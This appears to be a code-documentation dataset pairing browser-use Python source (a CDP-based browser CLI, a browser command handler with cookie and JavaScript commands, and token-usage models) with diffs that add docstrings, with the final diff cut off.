if not args or args[0] in ('help', '--help', '-h'):
print("""Usage: python -m browser_use.skill_cli.direct <command> [args]
Commands:
open <url> Navigate to URL
state Get DOM state with viewport info
click <index> Click element by index (uses cached positions)
click <x> <y> Click at viewport coordinates
type <text> Type into focused element
input <index> <text> Click element then type
screenshot [path] Take screenshot (saves to file or prints base64+dimensions)
scroll [up|down] Scroll page (default: down)
back Go back in history
keys <keys> Send keyboard keys
html [selector] Get raw HTML (full page or CSS selector)
eval <js> Execute JavaScript
close Kill browser and clean up
Flags:
--remote Use browser-use cloud browser (requires BROWSER_USE_API_KEY)""")
return 0 if args else 1
# Extract --remote flag
use_remote = '--remote' in args
args = [a for a in args if a != '--remote']
if not args:
print('Error: No command specified', file=sys.stderr)
return 1
command = args[0]
# ── close: lightweight CDP kill ──────────────────────────────────────
if command == 'close':
state = _load_state()
cdp_url = state.get('cdp_url')
if not cdp_url:
print('No active browser session')
else:
closed = False
try:
from cdp_use import CDPClient
client = CDPClient(cdp_url)
await client.start()
await client.send.Browser.close()
await client.stop()
closed = True
except Exception:
pass
if not closed:
try:
from browser_use.browser.session import BrowserSession
session = BrowserSession(cdp_url=cdp_url)
await session.start()
await session.kill()
except Exception:
pass
_clear_state()
print('Browser closed')
return 0
# ── open: lightweight if reconnecting, full session if first launch ──
if command == 'open' and len(args) >= 2:
url = args[1]
if not url.startswith(('http://', 'https://', 'file://')):
url = 'https://' + url
state = _load_state()
if state.get('cdp_url'):
# Reconnect — lightweight CDP navigate
try:
async with _lightweight_cdp() as cdp:
await _cdp_navigate(cdp, url)
# Update target_id in state
current_state = _load_state()
current_state['target_id'] = cdp.target_id
_save_state(current_state)
print(f'Navigated to: {url}')
return 0
except RuntimeError:
# Browser died — fall through to full session launch
_clear_state()
# First launch — needs full session
async with browser(use_remote=use_remote) as session:
from browser_use.browser.events import NavigateToUrlEvent
await session.event_bus.dispatch(NavigateToUrlEvent(url=url))
if session.agent_focus_target_id:
current_state = _load_state()
current_state['target_id'] = session.agent_focus_target_id
_save_state(current_state)
print(f'Navigated to: {url}')
return 0
# ── state: full session (needs DOMWatchdog for DOM tree building) ────
if command == 'state':
async with browser(use_remote=use_remote) as session:
state_summary = await session.get_browser_state_summary()
assert state_summary.dom_state is not None
text = state_summary.dom_state.llm_representation()
if state_summary.page_info:
pi = state_summary.page_info
header = f'viewport: {pi.viewport_width}x{pi.viewport_height}\n'
header += f'page: {pi.page_width}x{pi.page_height}\n'
header += f'scroll: ({pi.scroll_x}, {pi.scroll_y})\n'
text = header + text
print(text)
# Cache selector map for subsequent click-by-index
selector_map = await session.get_selector_map()
if selector_map:
_save_selector_cache(selector_map)
return 0
# ── Lightweight commands (Tier 1) ────────────────────────────────────
if command in _LIGHTWEIGHT_COMMANDS:
try:
async with _lightweight_cdp() as cdp:
if command == 'screenshot':
path = args[1] if len(args) >= 2 else None
await _cdp_screenshot(cdp, path)
elif command == 'click' and len(args) >= 2:
int_args = [int(a) for a in args[1:]]
if len(int_args) == 2:
x, y = int_args
await _cdp_click_coordinate(cdp, x, y)
print(f'Clicked at ({x}, {y})')
elif len(int_args) == 1:
await _cdp_click_index(cdp, int_args[0])
else:
print('Usage: click <index> or click <x> <y>', file=sys.stderr)
return 1
elif command == 'type' and len(args) >= 2:
text = ' '.join(args[1:])
await _cdp_type(cdp, text)
print(f'Typed: {text}')
elif command == 'input' and len(args) >= 3:
index = int(args[1])
text = ' '.join(args[2:])
await _cdp_input(cdp, index, text)
elif command == 'scroll':
direction = args[1] if len(args) >= 2 else 'down'
await _cdp_scroll(cdp, direction)
print(f'Scrolled {direction}')
elif command == 'back':
await _cdp_back(cdp)
print('Navigated back')
elif command == 'keys' and len(args) >= 2:
await _cdp_keys(cdp, ' '.join(args[1:]))
print(f'Sent keys: {" ".join(args[1:])}')
elif command == 'html':
selector = args[1] if len(args) >= 2 else None
await _cdp_html(cdp, selector)
elif command == 'eval' and len(args) >= 2:
js = ' '.join(args[1:])
await _cdp_eval(cdp, js)
else:
print(f'Missing arguments for: {command}', file=sys.stderr)
return 1
except RuntimeError as e:
print(f'Error: {e}', file=sys.stderr)
return 1
return 0
print(f'Unknown command: {command}', file=sys.stderr)
return 1
if __name__ == '__main__':
sys.exit(asyncio.run(main())) | --- +++ @@ -1,3 +1,21 @@+"""Serverless CLI for browser-use - runs commands directly without a session server.
+
+Each command reconnects to the browser via CDP WebSocket URL saved to a state file.
+The browser process stays alive between commands; only the Python process exits.
+
+Two-tier reconnection:
+ Tier 1 (Lightweight CDP, ~200ms): Most commands use raw CDPClient + Target.attachToTarget.
+ No BrowserSession, no watchdogs, no event bus.
+ Tier 2 (Full BrowserSession, ~3s): Only for `state` (needs DOMWatchdog) and first-time
+ `open` (needs to launch browser).
+
+Usage:
+ python -m browser_use.skill_cli.direct open https://example.com
+ python -m browser_use.skill_cli.direct state
+ python -m browser_use.skill_cli.direct click 200 400
+ python -m browser_use.skill_cli.direct screenshot ./shot.png
+ python -m browser_use.skill_cli.direct close
+"""
import asyncio
import base64
@@ -44,6 +62,11 @@
def _save_selector_cache(selector_map: dict[int, Any]) -> None:
+ """Cache element positions from the selector map into the state file.
+
+ Stores absolute_position (document coordinates) so click-by-index can
+ convert to viewport coords at click time using current scroll offset.
+ """
cache: dict[str, dict[str, Any]] = {}
for idx, node in selector_map.items():
pos = getattr(node, 'absolute_position', None)
@@ -69,6 +92,7 @@
def _load_selector_cache() -> dict[int, dict[str, Any]]:
+ """Load cached element positions. Returns {index: {x, y, w, h, tag, text}}."""
state = _load_state()
raw = state.get('selector_map', {})
return {int(k): v for k, v in raw.items()}
@@ -81,6 +105,7 @@
@dataclass
class LightCDP:
+ """Minimal CDP connection — no BrowserSession, no watchdogs."""
client: 'CDPClient'
session_id: str
@@ -89,6 +114,10 @@
@asynccontextmanager
async def _lightweight_cdp():
+ """Connect to the browser via raw CDP. ~200ms total.
+
+ Raises RuntimeError if no saved state or browser is dead.
+ """
from cdp_use import CDPClient
state = _load_state()
@@ -141,6 +170,7 @@
async def _activate_content_target(session: 'BrowserSession', saved_target_id: str | None) -> None:
+ """After reconnection, ensure the session focuses on the actual page, not about:blank."""
current_url = await session.get_current_page_url()
if current_url and current_url.startswith(('http://', 'https://')):
return
@@ -167,6 +197,7 @@
@asynccontextmanager
async def browser(use_remote: bool = False):
+ """Connect to existing browser or launch a new one. Disconnects CDP on exit."""
from browser_use.browser.session import BrowserSession
state = _load_state()
@@ -212,6 +243,7 @@
async def _cdp_navigate(cdp: LightCDP, url: str) -> None:
+ """Navigate to URL and invalidate selector cache."""
await cdp.client.send.Page.navigate(params={'url': url}, session_id=cdp.session_id)
# Invalidate selector cache — page changed, elements are gone
state = _load_state()
@@ -220,6 +252,7 @@
async def _cdp_screenshot(cdp: LightCDP, path: str | None) -> None:
+ """Take screenshot, save to file or print base64+dimensions."""
result = await cdp.client.send.Page.captureScreenshot(params={'format': 'png'}, session_id=cdp.session_id)
data = base64.b64decode(result['data'])
@@ -244,6 +277,7 @@
async def _cdp_click_coordinate(cdp: LightCDP, x: int, y: int) -> None:
+ """Click at viewport coordinates using CDP Input.dispatchMouseEvent."""
sid = cdp.session_id
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': x, 'y': y},
@@ -262,6 +296,7 @@
async def _get_scroll_offset(cdp: LightCDP) -> tuple[float, float]:
+ """Get current scroll position via JS."""
result = await cdp.client.send.Runtime.evaluate(
params={
'expression': 'JSON.stringify({x:window.scrollX,y:window.scrollY})',
@@ -274,6 +309,7 @@
async def _cdp_click_index(cdp: LightCDP, index: int) -> None:
+ """Click element by cached index. Converts document coords to viewport coords."""
cache = _load_selector_cache()
if index not in cache:
print(f'Error: Element index {index} not in cache. Run "state" first.', file=sys.stderr)
@@ -294,10 +330,12 @@
async def _cdp_type(cdp: LightCDP, text: str) -> None:
+ """Type text into focused element."""
await cdp.client.send.Input.insertText(params={'text': text}, session_id=cdp.session_id)
async def _cdp_input(cdp: LightCDP, index: int, text: str) -> None:
+ """Click element by index then type text."""
await _cdp_click_index(cdp, index)
await asyncio.sleep(0.1)
await _cdp_type(cdp, text)
@@ -305,6 +343,7 @@
async def _cdp_scroll(cdp: LightCDP, direction: str) -> None:
+ """Scroll page up or down by 500px."""
amount = -500 if direction == 'up' else 500
await cdp.client.send.Runtime.evaluate(
params={
@@ -316,6 +355,7 @@
async def _cdp_back(cdp: LightCDP) -> None:
+ """Go back in browser history."""
nav = await cdp.client.send.Page.getNavigationHistory(session_id=cdp.session_id)
current_index = nav.get('currentIndex', 0)
entries = nav.get('entries', [])
@@ -331,6 +371,7 @@
async def _cdp_keys(cdp: LightCDP, keys_str: str) -> None:
+ """Send keyboard keys/shortcuts via CDP."""
from browser_use.actor.utils import get_key_info
# Key alias normalization (same as default_action_watchdog)
@@ -442,6 +483,7 @@
async def _cdp_html(cdp: LightCDP, selector: str | None) -> None:
+ """Get raw HTML of the page or a CSS selector."""
if selector:
js = f'(function(){{ const el = document.querySelector({json.dumps(selector)}); return el ? el.outerHTML : null; }})()'
else:
@@ -457,6 +499,7 @@
async def _cdp_eval(cdp: LightCDP, js: str) -> None:
+ """Execute JavaScript and print result."""
result = await cdp.client.send.Runtime.evaluate(params={'expression': js, 'returnByValue': True}, session_id=cdp.session_id)
value = result.get('result', {}).get('value')
print(json.dumps(value) if value is not None else 'undefined')
@@ -665,4 +708,4 @@
if __name__ == '__main__':
- sys.exit(asyncio.run(main()))+ sys.exit(asyncio.run(main()))
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/direct.py |
Create docstrings for each class method |
import asyncio
import base64
import logging
from pathlib import Path
from typing import Any
from browser_use.skill_cli.sessions import SessionInfo
logger = logging.getLogger(__name__)
COMMANDS = {
'open',
'click',
'type',
'input',
'scroll',
'back',
'screenshot',
'state',
'switch',
'close-tab',
'keys',
'select',
'eval',
'extract',
'cookies',
'wait',
'hover',
'dblclick',
'rightclick',
'get',
}
async def _execute_js(session: SessionInfo, js: str) -> Any:
bs = session.browser_session
# Get or create a CDP session for the focused target
cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
raise RuntimeError('No active browser session')
result = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': js, 'returnByValue': True},
session_id=cdp_session.session_id,
)
return result.get('result', {}).get('value')
async def _get_element_center(session: SessionInfo, node: Any) -> tuple[float, float] | None:
bs = session.browser_session
try:
cdp_session = await bs.cdp_client_for_node(node)
session_id = cdp_session.session_id
backend_node_id = node.backend_node_id
# Scroll element into view first
try:
await cdp_session.cdp_client.send.DOM.scrollIntoViewIfNeeded(
params={'backendNodeId': backend_node_id}, session_id=session_id
)
await asyncio.sleep(0.05)
except Exception:
pass
# Get element coordinates
element_rect = await bs.get_element_coordinates(backend_node_id, cdp_session)
if element_rect:
center_x = element_rect.x + element_rect.width / 2
center_y = element_rect.y + element_rect.height / 2
return center_x, center_y
return None
except Exception as e:
logger.error(f'Failed to get element center: {e}')
return None
async def handle(action: str, session: SessionInfo, params: dict[str, Any]) -> Any:
bs = session.browser_session
if action == 'open':
url = params['url']
# Ensure URL has scheme
if not url.startswith(('http://', 'https://', 'file://')):
url = 'https://' + url
from browser_use.browser.events import NavigateToUrlEvent
await bs.event_bus.dispatch(NavigateToUrlEvent(url=url))
result: dict[str, Any] = {'url': url}
# Add live preview URL for cloud browsers
if bs.browser_profile.use_cloud and bs.cdp_url:
from urllib.parse import quote
result['live_url'] = f'https://live.browser-use.com/?wss={quote(bs.cdp_url, safe="")}'
return result
elif action == 'click':
args = params.get('args', [])
if len(args) == 2:
# Coordinate click: browser-use click <x> <y>
from browser_use.browser.events import ClickCoordinateEvent
x, y = args
await bs.event_bus.dispatch(ClickCoordinateEvent(coordinate_x=x, coordinate_y=y))
return {'clicked_coordinate': {'x': x, 'y': y}}
elif len(args) == 1:
# Index click: browser-use click <index>
from browser_use.browser.events import ClickElementEvent
index = args[0]
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
await bs.event_bus.dispatch(ClickElementEvent(node=node))
return {'clicked': index}
else:
return {'error': 'Usage: click <index> or click <x> <y>'}
elif action == 'type':
# Type into currently focused element using CDP directly
text = params['text']
cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
return {'error': 'No active browser session'}
await cdp_session.cdp_client.send.Input.insertText(
params={'text': text},
session_id=cdp_session.session_id,
)
return {'typed': text}
elif action == 'input':
from browser_use.browser.events import ClickElementEvent, TypeTextEvent
index = params['index']
text = params['text']
# Look up node from selector map
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
await bs.event_bus.dispatch(ClickElementEvent(node=node))
await bs.event_bus.dispatch(TypeTextEvent(node=node, text=text))
return {'input': text, 'element': index}
elif action == 'scroll':
from browser_use.browser.events import ScrollEvent
direction = params.get('direction', 'down')
amount = params.get('amount', 500)
await bs.event_bus.dispatch(ScrollEvent(direction=direction, amount=amount))
return {'scrolled': direction, 'amount': amount}
elif action == 'back':
from browser_use.browser.events import GoBackEvent
await bs.event_bus.dispatch(GoBackEvent())
return {'back': True}
elif action == 'screenshot':
data = await bs.take_screenshot(full_page=params.get('full', False))
if params.get('path'):
path = Path(params['path'])
path.write_bytes(data)
return {'saved': str(path), 'size': len(data)}
# Return base64 encoded
return {'screenshot': base64.b64encode(data).decode(), 'size': len(data)}
elif action == 'state':
# Return the LLM representation with viewport info for coordinate clicking
state = await bs.get_browser_state_summary()
assert state.dom_state is not None
state_text = state.dom_state.llm_representation()
# Prepend viewport dimensions so LLMs know the coordinate space
if state.page_info:
pi = state.page_info
viewport_text = f'viewport: {pi.viewport_width}x{pi.viewport_height}\n'
viewport_text += f'page: {pi.page_width}x{pi.page_height}\n'
viewport_text += f'scroll: ({pi.scroll_x}, {pi.scroll_y})\n'
state_text = viewport_text + state_text
return {'_raw_text': state_text}
elif action == 'switch':
from browser_use.browser.events import SwitchTabEvent
tab_index = params['tab']
# Get target_id from tab index
page_targets = bs.session_manager.get_all_page_targets() if bs.session_manager else []
if tab_index < 0 or tab_index >= len(page_targets):
return {'error': f'Invalid tab index {tab_index}. Available: 0-{len(page_targets) - 1}'}
target_id = page_targets[tab_index].target_id
await bs.event_bus.dispatch(SwitchTabEvent(target_id=target_id))
return {'switched': tab_index}
elif action == 'close-tab':
from browser_use.browser.events import CloseTabEvent
tab_index = params.get('tab')
# Get target_id from tab index
page_targets = bs.session_manager.get_all_page_targets() if bs.session_manager else []
if tab_index is not None:
if tab_index < 0 or tab_index >= len(page_targets):
return {'error': f'Invalid tab index {tab_index}. Available: 0-{len(page_targets) - 1}'}
target_id = page_targets[tab_index].target_id
else:
# Close current/focused tab
target_id = bs.session_manager.get_focused_target().target_id if bs.session_manager else None
if not target_id:
return {'error': 'No focused tab to close'}
await bs.event_bus.dispatch(CloseTabEvent(target_id=target_id))
return {'closed': tab_index}
elif action == 'keys':
from browser_use.browser.events import SendKeysEvent
keys = params['keys']
await bs.event_bus.dispatch(SendKeysEvent(keys=keys))
return {'sent': keys}
elif action == 'select':
from browser_use.browser.events import SelectDropdownOptionEvent
index = params['index']
value = params['value']
# Look up node from selector map
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
await bs.event_bus.dispatch(SelectDropdownOptionEvent(node=node, text=value))
return {'selected': value, 'element': index}
elif action == 'eval':
js = params['js']
# Execute JavaScript via CDP
result = await _execute_js(session, js)
return {'result': result}
elif action == 'extract':
query = params['query']
# This requires LLM integration
# For now, return a placeholder
return {'query': query, 'error': 'extract requires agent mode - use: browser-use run "extract ..."'}
elif action == 'hover':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
coords = await _get_element_center(session, node)
if not coords:
return {'error': 'Could not get element coordinates for hover'}
center_x, center_y = coords
cdp_session = await bs.cdp_client_for_node(node)
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': center_x, 'y': center_y},
session_id=cdp_session.session_id,
)
return {'hovered': index}
elif action == 'dblclick':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
coords = await _get_element_center(session, node)
if not coords:
return {'error': 'Could not get element coordinates for double-click'}
center_x, center_y = coords
cdp_session = await bs.cdp_client_for_node(node)
session_id = cdp_session.session_id
# Move mouse to element
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': center_x, 'y': center_y},
session_id=session_id,
)
await asyncio.sleep(0.05)
# Double click (clickCount: 2)
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={
'type': 'mousePressed',
'x': center_x,
'y': center_y,
'button': 'left',
'clickCount': 2,
},
session_id=session_id,
)
await asyncio.sleep(0.05)
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={
'type': 'mouseReleased',
'x': center_x,
'y': center_y,
'button': 'left',
'clickCount': 2,
},
session_id=session_id,
)
return {'double_clicked': index}
elif action == 'rightclick':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
coords = await _get_element_center(session, node)
if not coords:
return {'error': 'Could not get element coordinates for right-click'}
center_x, center_y = coords
cdp_session = await bs.cdp_client_for_node(node)
session_id = cdp_session.session_id
# Move mouse to element
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': center_x, 'y': center_y},
session_id=session_id,
)
await asyncio.sleep(0.05)
# Right click (button: 'right')
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={
'type': 'mousePressed',
'x': center_x,
'y': center_y,
'button': 'right',
'clickCount': 1,
},
session_id=session_id,
)
await asyncio.sleep(0.05)
await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
params={
'type': 'mouseReleased',
'x': center_x,
'y': center_y,
'button': 'right',
'clickCount': 1,
},
session_id=session_id,
)
return {'right_clicked': index}
elif action == 'cookies':
cookies_command = params.get('cookies_command')
if cookies_command == 'get':
# Get cookies via direct CDP
cookies = await bs._cdp_get_cookies()
# Convert Cookie objects to dicts
cookie_list: list[dict[str, Any]] = []
for c in cookies:
cookie_dict: dict[str, Any] = {
'name': c.get('name', ''),
'value': c.get('value', ''),
'domain': c.get('domain', ''),
'path': c.get('path', '/'),
'secure': c.get('secure', False),
'httpOnly': c.get('httpOnly', False),
}
if 'sameSite' in c:
cookie_dict['sameSite'] = c.get('sameSite')
if 'expires' in c:
cookie_dict['expires'] = c.get('expires')
cookie_list.append(cookie_dict)
# Filter by URL if provided
url = params.get('url')
if url:
from urllib.parse import urlparse
parsed = urlparse(url)
domain = parsed.netloc
cookie_list = [
c
for c in cookie_list
if domain.endswith(str(c.get('domain', '')).lstrip('.'))
or str(c.get('domain', '')).lstrip('.').endswith(domain)
]
return {'cookies': cookie_list}
elif cookies_command == 'set':
from cdp_use.cdp.network import Cookie
cookie_dict: dict[str, Any] = {
'name': params['name'],
'value': params['value'],
'path': params.get('path', '/'),
'secure': params.get('secure', False),
'httpOnly': params.get('http_only', False),
}
if params.get('domain'):
cookie_dict['domain'] = params['domain']
if params.get('same_site'):
cookie_dict['sameSite'] = params['same_site']
if params.get('expires'):
cookie_dict['expires'] = params['expires']
# If no domain specified, get current URL's domain
if not params.get('domain'):
hostname = await _execute_js(session, 'window.location.hostname')
if hostname:
cookie_dict['domain'] = hostname
try:
cookie_obj = Cookie(**cookie_dict)
await bs._cdp_set_cookies([cookie_obj])
return {'set': params['name'], 'success': True}
except Exception as e:
logger.error(f'Failed to set cookie: {e}')
return {'set': params['name'], 'success': False, 'error': str(e)}
elif cookies_command == 'clear':
url = params.get('url')
if url:
# Clear cookies only for specific URL domain
from urllib.parse import urlparse
cookies = await bs._cdp_get_cookies()
parsed = urlparse(url)
domain = parsed.netloc
cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
if cdp_session:
for cookie in cookies:
cookie_domain = str(cookie.get('domain', '')).lstrip('.')
if domain.endswith(cookie_domain) or cookie_domain.endswith(domain):
await cdp_session.cdp_client.send.Network.deleteCookies(
params={
'name': cookie.get('name', ''),
'domain': cookie.get('domain'),
'path': cookie.get('path', '/'),
},
session_id=cdp_session.session_id,
)
else:
# Clear all cookies
await bs._cdp_clear_cookies()
return {'cleared': True, 'url': url}
elif cookies_command == 'export':
import json
# Get cookies via direct CDP
cookies = await bs._cdp_get_cookies()
# Convert to list of dicts
cookie_list: list[dict[str, Any]] = []
for c in cookies:
cookie_dict: dict[str, Any] = {
'name': c.get('name', ''),
'value': c.get('value', ''),
'domain': c.get('domain', ''),
'path': c.get('path', '/'),
'secure': c.get('secure', False),
'httpOnly': c.get('httpOnly', False),
}
if 'sameSite' in c:
cookie_dict['sameSite'] = c.get('sameSite')
if 'expires' in c:
cookie_dict['expires'] = c.get('expires')
cookie_list.append(cookie_dict)
# Filter by URL if provided
url = params.get('url')
if url:
from urllib.parse import urlparse
parsed = urlparse(url)
domain = parsed.netloc
cookie_list = [
c
for c in cookie_list
if domain.endswith(str(c.get('domain', '')).lstrip('.'))
or str(c.get('domain', '')).lstrip('.').endswith(domain)
]
file_path = Path(params['file'])
file_path.write_text(json.dumps(cookie_list, indent=2, ensure_ascii=False), encoding='utf-8')
return {'exported': len(cookie_list), 'file': str(file_path)}
elif cookies_command == 'import':
import json
file_path = Path(params['file'])
if not file_path.exists():
return {'error': f'File not found: {file_path}'}
cookies = json.loads(file_path.read_text())
# Get CDP session for bulk cookie setting
cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
return {'error': 'No active browser session'}
# Build cookie list for bulk set
cookie_list = []
for c in cookies:
cookie_params = {
'name': c['name'],
'value': c['value'],
'domain': c.get('domain'),
'path': c.get('path', '/'),
'secure': c.get('secure', False),
'httpOnly': c.get('httpOnly', False),
}
if c.get('sameSite'):
cookie_params['sameSite'] = c['sameSite']
if c.get('expires'):
cookie_params['expires'] = c['expires']
cookie_list.append(cookie_params)
# Set all cookies in one call
try:
await cdp_session.cdp_client.send.Network.setCookies(
params={'cookies': cookie_list}, # type: ignore[arg-type]
session_id=cdp_session.session_id,
)
return {'imported': len(cookie_list), 'file': str(file_path)}
except Exception as e:
return {'error': f'Failed to import cookies: {e}'}
return {'error': 'Invalid cookies command. Use: get, set, clear, export, import'}
elif action == 'wait':
import json as json_module
wait_command = params.get('wait_command')
if wait_command == 'selector':
timeout_seconds = params.get('timeout', 30000) / 1000.0
state = params.get('state', 'visible')
selector = params['selector']
poll_interval = 0.1
elapsed = 0.0
while elapsed < timeout_seconds:
# Build JS check based on state
if state == 'attached':
js = f'document.querySelector({json_module.dumps(selector)}) !== null'
elif state == 'detached':
js = f'document.querySelector({json_module.dumps(selector)}) === null'
elif state == 'visible':
js = f"""
(function() {{
const el = document.querySelector({json_module.dumps(selector)});
if (!el) return false;
const style = window.getComputedStyle(el);
const rect = el.getBoundingClientRect();
return style.display !== 'none' &&
style.visibility !== 'hidden' &&
style.opacity !== '0' &&
rect.width > 0 &&
rect.height > 0;
}})()
"""
elif state == 'hidden':
js = f"""
(function() {{
const el = document.querySelector({json_module.dumps(selector)});
if (!el) return true;
const style = window.getComputedStyle(el);
const rect = el.getBoundingClientRect();
return style.display === 'none' ||
style.visibility === 'hidden' ||
style.opacity === '0' ||
rect.width === 0 ||
rect.height === 0;
}})()
"""
else:
js = f'document.querySelector({json_module.dumps(selector)}) !== null'
result = await _execute_js(session, js)
if result:
return {'selector': selector, 'found': True}
await asyncio.sleep(poll_interval)
elapsed += poll_interval
return {'selector': selector, 'found': False}
elif wait_command == 'text':
import json as json_module
timeout_seconds = params.get('timeout', 30000) / 1000.0
text = params['text']
poll_interval = 0.1
elapsed = 0.0
while elapsed < timeout_seconds:
js = f"""
(function() {{
const text = {json_module.dumps(text)};
return document.body.innerText.includes(text);
}})()
"""
result = await _execute_js(session, js)
if result:
return {'text': text, 'found': True}
await asyncio.sleep(poll_interval)
elapsed += poll_interval
return {'text': text, 'found': False}
return {'error': 'Invalid wait command. Use: selector, text'}
elif action == 'get':
import json as json_module
get_command = params.get('get_command')
if get_command == 'title':
title = await _execute_js(session, 'document.title')
return {'title': title or ''}
elif get_command == 'html':
selector = params.get('selector')
if selector:
js = f'(function(){{ const el = document.querySelector({json_module.dumps(selector)}); return el ? el.outerHTML : null; }})()'
else:
js = 'document.documentElement.outerHTML'
html = await _execute_js(session, js)
return {'html': html or ''}
elif get_command == 'text':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
# Use the node's text from our model
text = node.get_all_children_text(max_depth=10) if node else ''
return {'index': index, 'text': text}
elif get_command == 'value':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
try:
cdp_session = await bs.cdp_client_for_node(node)
resolve_result = await cdp_session.cdp_client.send.DOM.resolveNode(
params={'backendNodeId': node.backend_node_id},
session_id=cdp_session.session_id,
)
object_id = resolve_result['object'].get('objectId') # type: ignore[union-attr]
if object_id:
value_result = await cdp_session.cdp_client.send.Runtime.callFunctionOn(
params={
'objectId': object_id,
'functionDeclaration': 'function() { return this.value; }',
'returnByValue': True,
},
session_id=cdp_session.session_id,
)
value = value_result.get('result', {}).get('value')
return {'index': index, 'value': value or ''}
else:
return {'index': index, 'value': ''}
except Exception as e:
logger.error(f'Failed to get element value: {e}')
return {'index': index, 'value': ''}
elif get_command == 'attributes':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
# Use the attributes from the node model
attrs = node.attributes or {}
return {'index': index, 'attributes': dict(attrs)}
elif get_command == 'bbox':
index = params['index']
node = await bs.get_element_by_index(index)
if node is None:
return {'error': f'Element index {index} not found - page may have changed'}
try:
cdp_session = await bs.cdp_client_for_node(node)
box_result = await cdp_session.cdp_client.send.DOM.getBoxModel(
params={'backendNodeId': node.backend_node_id},
session_id=cdp_session.session_id,
)
model = box_result['model'] # type: ignore[index]
content = model.get('content', []) # type: ignore[union-attr]
if len(content) >= 8:
# content is [x1, y1, x2, y2, x3, y3, x4, y4] - corners of the quad
x = min(content[0], content[2], content[4], content[6])
y = min(content[1], content[3], content[5], content[7])
width = max(content[0], content[2], content[4], content[6]) - x
height = max(content[1], content[3], content[5], content[7]) - y
return {'index': index, 'bbox': {'x': x, 'y': y, 'width': width, 'height': height}}
else:
return {'index': index, 'bbox': {}}
except Exception as e:
logger.error(f'Failed to get element bbox: {e}')
return {'index': index, 'bbox': {}}
return {'error': 'Invalid get command. Use: title, html, text, value, attributes, bbox'}
raise ValueError(f'Unknown browser action: {action}') | --- +++ @@ -1,3 +1,4 @@+"""Browser control commands."""
import asyncio
import base64
@@ -34,6 +35,7 @@
async def _execute_js(session: SessionInfo, js: str) -> Any:
+ """Execute JavaScript in the browser via CDP."""
bs = session.browser_session
# Get or create a CDP session for the focused target
cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
@@ -48,6 +50,7 @@
async def _get_element_center(session: SessionInfo, node: Any) -> tuple[float, float] | None:
+ """Get the center coordinates of an element."""
bs = session.browser_session
try:
cdp_session = await bs.cdp_client_for_node(node)
@@ -76,6 +79,7 @@
async def handle(action: str, session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle browser control command."""
bs = session.browser_session
if action == 'open':
@@ -719,4 +723,4 @@
return {'error': 'Invalid get command. Use: title, html, text, value, attributes, bbox'}
- raise ValueError(f'Unknown browser action: {action}')+ raise ValueError(f'Unknown browser action: {action}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/browser.py |
Create documentation strings for testing functions | from datetime import datetime
from typing import Any, TypeVar
from pydantic import BaseModel, Field
from browser_use.llm.views import ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
class TokenUsageEntry(BaseModel):
model: str
timestamp: datetime
usage: ChatInvokeUsage
class TokenCostCalculated(BaseModel):
new_prompt_tokens: int
new_prompt_cost: float
prompt_read_cached_tokens: int | None
prompt_read_cached_cost: float | None
prompt_cached_creation_tokens: int | None
prompt_cache_creation_cost: float | None
"""Anthropic only: The cost of creating the cache."""
completion_tokens: int
completion_cost: float
@property
def prompt_cost(self) -> float:
return self.new_prompt_cost + (self.prompt_read_cached_cost or 0) + (self.prompt_cache_creation_cost or 0)
@property
def total_cost(self) -> float:
return (
self.new_prompt_cost
+ (self.prompt_read_cached_cost or 0)
+ (self.prompt_cache_creation_cost or 0)
+ self.completion_cost
)
class ModelPricing(BaseModel):
model: str
input_cost_per_token: float | None
output_cost_per_token: float | None
cache_read_input_token_cost: float | None
cache_creation_input_token_cost: float | None
max_tokens: int | None
max_input_tokens: int | None
max_output_tokens: int | None
class CachedPricingData(BaseModel):
timestamp: datetime
data: dict[str, Any]
class ModelUsageStats(BaseModel):
model: str
prompt_tokens: int = 0
completion_tokens: int = 0
total_tokens: int = 0
cost: float = 0.0
invocations: int = 0
average_tokens_per_invocation: float = 0.0
class ModelUsageTokens(BaseModel):
model: str
prompt_tokens: int
prompt_cached_tokens: int
completion_tokens: int
total_tokens: int
class UsageSummary(BaseModel):
total_prompt_tokens: int
total_prompt_cost: float
total_prompt_cached_tokens: int
total_prompt_cached_cost: float
total_completion_tokens: int
total_completion_cost: float
total_tokens: int
total_cost: float
entry_count: int
by_model: dict[str, ModelUsageStats] = Field(default_factory=dict) | --- +++ @@ -9,6 +9,7 @@
class TokenUsageEntry(BaseModel):
+ """Single token usage entry"""
model: str
timestamp: datetime
@@ -16,6 +17,7 @@
